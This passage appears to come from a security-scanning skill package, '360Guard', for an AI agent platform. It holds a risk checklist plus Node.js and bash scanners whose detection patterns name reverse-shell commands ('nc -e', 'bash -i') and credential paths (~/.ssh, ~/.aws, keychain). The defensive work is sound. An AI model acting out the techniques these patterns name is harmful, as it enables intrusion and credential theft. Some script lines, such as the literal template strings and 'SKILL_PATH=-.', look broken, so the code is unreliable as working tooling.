- [x] Creates cron job / systemd service
- [x] Modifies ~/.ssh/authorized_keys
- [x] Writes to /etc/hosts
- [x] Adds Login Items / Startup Items
- [x] Modifies .bashrc / .zshrc / profile
- [x] Registers LaunchAgent (macOS)
- [x] Installs systemd user service
### 2. Monitoring & Eavesdropping 🔴
- [x] Screen capture/recording permission
- [x] Audio recording permission
- [x] Keyloggers
- [x] Accesses microphone/camera
- [x] File system monitoring (fswatch/inotify)
### 3. Data & Privacy 🔴
- [x] Reads clipboard
- [x] Reads environment variables (API_/SECRET/TOKEN prefix)
- [x] Accesses browser history/bookmarks
- [x] Accesses macOS Keychain
- [x] Accesses iMessage/SMS
- [x] Accesses contacts/calendar
- [x] Accesses photo library
### 4. Network & Communication 🔴
- [x] Initiates reverse shell
- [x] Uses Tor proxy
- [x] DNS queries to suspicious domains
- [x] WebSocket long connections
- [x] IRC connections
- [x] Non-standard ports
- [x] Hardcoded IP addresses
### 5. Code Execution (Advanced) 🔴
- [x] Dynamic import (importlib.import_module)
- [x] __import__() dynamic loading
- [x] compile() dynamic compilation
- [x] xmlrpc / jsonrpc remote calls
- [x] pickle / yaml / marshal deserialization
- [x] exec() / eval() any string
- [x] subprocess shell=True
### 6. File System 🟡
- [x] Writes to executable paths outside /tmp
- [x] Modifies /usr/local/bin
- [x] Writes .dmg/.pkg installers
- [x] Creates .hidden files/directories
- [x] File permission modification (chmod +x)
- [x] Symbolic links (pointing external)
- [x] Contains binary files
### 7. Dependencies & Supply Chain 🟡
- [x] Dependency version range too wide
- [x] Dependencies from private/unknown sources
- [x] Dependencies on deprecated packages
- [x] Silent additional dependency downloads
- [x] References other unvetted Skills
- [x] Uses git submodule
### 8. Social Engineering 🟡
- [x] Mimics popular Skill names
- [x] README overpromises
- [x] No source code, only compiled binaries
- [x] Author has no history
- [x] Downloads vs stars ratio suspicious
---
## 🛠️ New Automated Features
### 1. Quick Scan (quick-scan.sh)
- Scan dangerous functions
- Scan sensitive paths
- Scan dangerous commands
- Scan persistence mechanisms
### 2. Full Scan (full-scan.sh)
- File structure analysis
- Dangerous function scan
- Sensitive path scan
- Network request scan
- Persistence check
- Dependency check
- Binary file check
- Symbolic link check
### 3. Node.js Scanner (scanner.cjs)
- Multi-language support (JS/TS/Python/Bash)
- Risk level output
- Code line number location
- Code snippet extraction
- Process exit codes (0=safe, 1=critical, 2=high)
---
## 📈 Benefits & Value
### 1. More Comprehensive Coverage
- Vetter has basic checks, 360Guard adds 3x more check items
- Covers advanced attack vectors like persistence, privacy, supply chain
### 2. Higher Automation
- Vetter is manual-only, 360Guard provides 3 automated tools
- Can be integrated into CI/CD or cron jobs
### 3. More Actionable
- 360Guard outputs structured reports for direct decision-making
- Clear exit codes for script integration
### 4. Continuously Evolving
- Modular design, easy to add new check items
- Reserved extension interface
---
## 📋 Output Report Comparison
### Skill Vetter Output
```
SKILL VETTING REPORT
══════════════════════════════════════
RED FLAGS: [None / List them]
RISK LEVEL: [🟢 LOW / 🟡 MEDIUM / 🔴 HIGH / ⛔ EXTREME]
VERDICT: [✅ SAFE / ⚠️ CAUTION / ❌ DO NOT INSTALL]
```
### 360Guard Output
```
🛡️ 360Guard Security Scan Report
══════════════════════════════════════
🔴 CRITICAL risk (X items):
• eval() execution - file.js:42
• Reverse shell - script.sh:15
⚠️ HIGH risk (X items):
• curl request - api.js:10
...
📄 Report saved: 360guard-report-20260313.txt
🔴 Conclusion: Critical risks found, not recommended to install
```
---
## 🎯 Use Cases
| Scenario | Recommended Use |
|----------|-----------------|
| Quick check (< 1 min) | quick-scan.sh |
| Full review (5-10 min) | full-scan.sh |
| Integrated into automation | scanner.cjs |
| Manual review guide | SKILL.md checklist |
---
## 📝 Usage Examples
```bash
# Quick scan
bash ~/.npm-global/lib/node_modules/openclaw/skills/360guard/scripts/quick-scan.sh /path/to/skill
# Full scan
bash ~/.npm-global/lib/node_modules/openclaw/skills/360guard/scripts/full-scan.sh /path/to/skill
# Node.js scan
node ~/.npm-global/lib/node_modules/openclaw/skills/360guard/scripts/scanner.cjs /path/to/skill
# Scan and auto-judge
node ~/.npm-global/lib/node_modules/openclaw/skills/360guard/scripts/scanner.cjs /path/to/skill
echo $? # 0=safe, 1=critical, 2=high
```
---
## 🔄 Version History
- **v1.0.0** (2026-03-13): Initial version
- Built on Skill Vetter
- Added 35+ check items
- Added 3 automated scripts
- Added detailed report output
---
> 🛡️ 360Guard — 360-degree security for your Agent
FILE:scripts/scanner.cjs
#!/usr/bin/env node
/**
* 360Guard Node.js Scanner
* Usage: node scanner.cjs /path/to/skill
*/
const fs = require('fs');
const path = require('path');
// Exclude paths - don't scan these directories
const EXCLUDE_DIRS = ['node_modules', '.git', 'scripts', '__pycache__', '.pytest_cache'];
const DANGER_PATTERNS = {
CRITICAL: [
{ pattern: /eval\s*\(/, name: 'eval() execution', desc: 'Dynamic code execution' },
{ pattern: /exec\s*\(/, name: 'exec() execution', desc: 'System command execution' },
{ pattern: /shell\s*=\s*true/i, name: 'subprocess shell=True', desc: 'Shell injection risk' },
{ pattern: /base64.*decode/i, name: 'base64 decode', desc: 'Code obfuscation detection' },
{ pattern: /pickle\.load/i, name: 'pickle deserialization', desc: 'Python deserialization vulnerability' },
{ pattern: /yaml\.load/i, name: 'yaml deserialization', desc: 'YAML deserialization risk' },
{ pattern: /__import__\s*\(/, name: 'dynamic import', desc: 'Dynamic module loading' },
{ pattern: /importlib\.import_module/i, name: 'importlib dynamic load', desc: 'Runtime loading' },
{ pattern: /xmlrpc/i, name: 'XML-RPC', desc: 'Remote procedure call' },
{ pattern: /reverse.*shell|nc\s+-e|bash\s+-i/i, name: 'reverse shell', desc: 'Potential backdoor' },
{ pattern: /child_process.*spawn.*shell/i, name: 'shell spawn', desc: 'Command execution' }
],
HIGH: [
{ pattern: /curl\s+['"`]/i, name: 'curl request', desc: 'Network request' },
{ pattern: /wget\s+['"`]/i, name: 'wget download', desc: 'File download' },
{ pattern: /fetch\s*\(/, name: 'fetch request', desc: 'HTTP request' },
{ pattern: /axios\./, name: 'axios request', desc: 'HTTP request' },
{ pattern: /https?:\/\/\d{1,3}\.\d{1,3}/, name: 'direct IP connection', desc: 'Non-domain network request' },
{ pattern: /process\.env/i, name: 'environment variable access', desc: 'Possible credential leak' },
{ pattern: /child_process/, name: 'subprocess', desc: 'System command execution' },
{ pattern: /http\.createServer|express\(\)/i, name: 'create server', desc: 'Local service' }
],
MEDIUM: [
{ pattern: /\/\.ssh\//, name: 'SSH directory', desc: 'Sensitive directory access' },
{ pattern: /\/\.aws\//, name: 'AWS directory', desc: 'Cloud credential directory' },
{ pattern: /keychain/i, name: 'Keychain', desc: 'System keychain' },
{ pattern: /credentials|token|secret|api[_-]?key/i, name: 'credential related', desc: 'Sensitive information' },
{ pattern: /cron|systemd|launchd/i, name: 'persistence mechanism', desc: 'Auto-start on boot' },
{ pattern: /setTimeout|setInterval.*eval/i, name: 'timer eval', desc: 'Dynamic execution' },
{ pattern: /document\.cookie/i, name: 'Cookie access', desc: 'Session hijacking' },
{ pattern: /localStorage|sessionStorage/i, name: 'storage access', desc: 'Data storage' }
]
};
function scanFile(filePath) {
const results = { CRITICAL: [], HIGH: [], MEDIUM: [] };
try {
const content = fs.readFileSync(filePath, 'utf8');
const lines = content.split('\n');
for (const [level, patterns] of Object.entries(DANGER_PATTERNS)) {
for (const { pattern, name, desc } of patterns) {
const matches = content.match(new RegExp(pattern, 'gi'));
if (matches) {
lines.forEach((line, idx) => {
if (pattern.test(line)) {
results[level].push({
file: filePath,
line: idx + 1,
issue: name,
desc: desc,
snippet: line.trim().substring(0, 80)
});
}
});
}
}
}
} catch (e) {
// Skip unreadable files
}
// Deduplicate
for (const level of Object.keys(results)) {
results[level] = results[level].filter((v, i, a) =>
a.findIndex(t => t.file === v.file && t.issue === v.issue) === i
);
}
return results;
}
function scanDirectory(dirPath) {
const allResults = { CRITICAL: [], HIGH: [], MEDIUM: [] };
function walk(dir) {
try {
const files = fs.readdirSync(dir);
for (const file of files) {
// Skip excluded directories
if (EXCLUDE_DIRS.includes(file) || file.startsWith('.')) continue;
const fullPath = path.join(dir, file);
try {
const stat = fs.statSync(fullPath);
if (stat.isDirectory()) {
walk(fullPath);
} else if (stat.isFile()) {
const ext = path.extname(file);
if (['.js', '.ts', '.jsx', '.tsx', '.py', '.sh', '.bash', '.zsh'].includes(ext)) {
const results = scanFile(fullPath);
for (const level of Object.keys(allResults)) {
allResults[level].push(...results[level]);
}
}
}
} catch (e) {
// Skip inaccessible files
}
}
} catch (e) {
// Skip inaccessible directories
}
}
walk(dirPath);
return allResults;
}
function generateReport(skillPath, results) {
console.log('\n🛡️ 360Guard Security Scan Report');
console.log('='.repeat(50));
console.log(`📂 Scan path: skillPath`);
console.log(`⏰ Scan time: new Date().toISOString()`);
console.log('');
const riskOrder = ['CRITICAL', 'HIGH', 'MEDIUM'];
const emoji = { CRITICAL: '🔴', HIGH: '⚠️', MEDIUM: '🟡' };
for (const level of riskOrder) {
if (results[level].length > 0) {
console.log(`\nemoji[level] level risk (results[level].length items):`);
for (const item of results[level]) {
console.log(` • item.issue`);
console.log(` Location: item.file:item.line`);
console.log(` Code: item.snippet...`);
}
}
}
console.log('\n' + '='.repeat(50));
if (results.CRITICAL.length > 0) {
console.log('🔴 Conclusion: Critical risks found, not recommended to install');
console.log('⚠️ Please stop immediately and delete the Skill');
process.exit(1);
} else if (results.HIGH.length > 0) {
console.log('⚠️ Conclusion: High risk found, human approval required');
process.exit(2);
} else if (results.MEDIUM.length > 0) {
console.log('🟡 Conclusion: Medium risk found, please review carefully before installing');
process.exit(0);
} else {
console.log('✅ Conclusion: No obvious risks found');
process.exit(0);
}
}
// Main program
const skillPath = process.argv[2] || '.';
if (!fs.existsSync(skillPath)) {
console.error('❌ Path does not exist:', skillPath);
console.log('Usage: node scanner.cjs /path/to/skill');
process.exit(1);
}
const stat = fs.statSync(skillPath);
const results = stat.isDirectory() ? scanDirectory(skillPath) : scanFile(skillPath);
generateReport(skillPath, results);
FILE:scripts/quick-scan.sh
#!/bin/bash
# 360Guard Quick Scan Script
# Usage: ./quick-scan.sh /path/to/skill
# Output: Quick risk assessment report
SKILL_PATH=-.
echo "🔍 360Guard Quick Scan: $SKILL_PATH"
echo "================================"
# Check dangerous functions
echo -e "\n📡 Network request check:"
grep -r "curl\|wget\|fetch\|http\.\|https\.\|socket\|request\|axios" "$SKILL_PATH" \
--include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null | head -5
# Check sensitive file access
echo -e "\n🔑 Sensitive path check:"
grep -r "~/.ssh\|~/.aws\|~/.config\|/etc/hosts\|authorized_keys\|keychain\|credentials" "$SKILL_PATH" \
--include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null
# Check dangerous commands
echo -e "\n⚠️ Dangerous command check:"
grep -r "eval\|exec\|shell=True\|base64 -d\|openssl\|subprocess" "$SKILL_PATH" \
--include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null
# Check persistence
echo -e "\n⏰ Persistence check:"
grep -r "cron\|systemd\|launchd\|login item\|autostart\|startup" "$SKILL_PATH" \
--include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null
echo -e "\n✅ Quick scan complete"
FILE:scripts/full-scan.sh
#!/bin/bash
# 360Guard Full Scan Script
# Usage: ./full-scan.sh /path/to/skill
SKILL_PATH=-.
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
REPORT="$SKILL_PATH/360guard-report-$TIMESTAMP.txt"
echo "🛡️ 360Guard Full Scan: $SKILL_PATH"
echo "========================================"
{
echo "🛡️ 360Guard Complete Security Scan Report"
echo "========================================"
echo "Scan time: $(date)"
echo "Scan path: $SKILL_PATH"
echo ""
# 1. File structure check
echo "📁 File structure:"
find "$SKILL_PATH" -type f 2>/dev/null | head -30
echo ""
# 2. Dangerous function scan
echo "⚠️ Dangerous function scan:"
for pattern in "eval(" "exec(" "shell=True" "base64" "subprocess" "importlib" "__import__" "pickle" "yaml.load" "xmlrpc" "socket.create_connection"; do
result=$(grep -r "$pattern" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null)
if [ -n "$result" ]; then
echo " ❌ Found: $pattern"
fi
done
echo ""
# 3. Sensitive path scan
echo "🔑 Sensitive path scan:"
for pattern in "~/.ssh" "~/.aws" "~/.config" "/etc/hosts" "authorized_keys" "keychain" "credentials" ".env"; do
result=$(grep -r "$pattern" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null)
if [ -n "$result" ]; then
echo " ⚠️ Warning: $pattern"
fi
done
echo ""
# 4. Network request scan
echo "🌐 Network request scan:"
grep -r "http://\|https://\|wget\|curl\|fetch" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null | grep -v "^#" | head -10
echo ""
# 5. Persistence check
echo "⏰ Persistence check:"
for pattern in "cron" "systemd" "launchd" "login item" "startup" "autostart"; do
result=$(grep -ri "$pattern" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.ts" --include="*.py" 2>/dev/null)
if [ -n "$result" ]; then
echo " 🔴 High risk: $pattern"
fi
done
echo ""
# 6. Dependency check
echo "📦 Dependency check:"
[ -f "$SKILL_PATH/package.json" ] && echo " package.json exists" && cat "$SKILL_PATH/package.json" | grep -E "dependencies|devDependencies" -A 20
[ -f "$SKILL_PATH/requirements.txt" ] && echo " requirements.txt exists" && cat "$SKILL_PATH/requirements.txt"
echo ""
# 7. Binary file check
echo "💾 Binary file check:"
find "$SKILL_PATH" -type f \( -name "*.so" -o -name "*.dylib" -o -name "*.exe" -o -name "*.bin" -o -name "*.dll" \) 2>/dev/null
echo ""
# 8. Symbolic link check
echo "🔗 Symbolic link check:"
find "$SKILL_PATH" -type l 2>/dev/null
echo ""
echo "========================================"
echo "✅ Full scan complete"
} | tee "$REPORT"
echo ""
echo "📄 Report saved to: $REPORT"